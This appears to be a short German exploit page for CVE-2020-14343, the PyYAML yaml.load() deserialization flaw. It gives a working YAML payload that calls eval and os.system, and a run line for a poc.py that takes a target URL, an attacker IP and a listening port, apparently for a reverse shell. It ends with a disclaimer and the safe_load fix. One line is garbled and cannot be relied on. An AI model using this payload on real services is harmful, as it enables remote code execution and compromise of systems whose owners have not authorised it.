
CVE-2020-14343的payload
| Element | Information |
|---|
| CVE-Nummer | CVE-2020-14343 |
| Betroffene Komponente | PyYAML < 5.4 |
| Schwachstellentyp | Deserialisierungs-Remote-Code-Ausführung (RCE) |
| Gefahrenstufe | Hoch |
PyYAML schränkt beim Parsen von nicht vertrauenswürdigen Daten mit yaml.load() keine gefährlichen YAML-Tags (wie !!python/object) ein. Ein Angreifer kann bösartigen YAML-Inhalt konstruieren, um beliebigen Python-Code auszuführen.
Payload-Kern:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <Ziel-URL> <Angreifer-IP> <Lauschport>
Beispiel:
python poc.py http://verwundbare-site.com 192.168.1.100 4444
/upload-Schnittstelle des Ziels hoch/login-Schnittstelle auspip install requests
⚠️ Dieses Tool ist ausschließlich für Sicherheitsforschung und autorisierte Tests bestimmt!
yaml.safe_load() anstelle von yaml.load()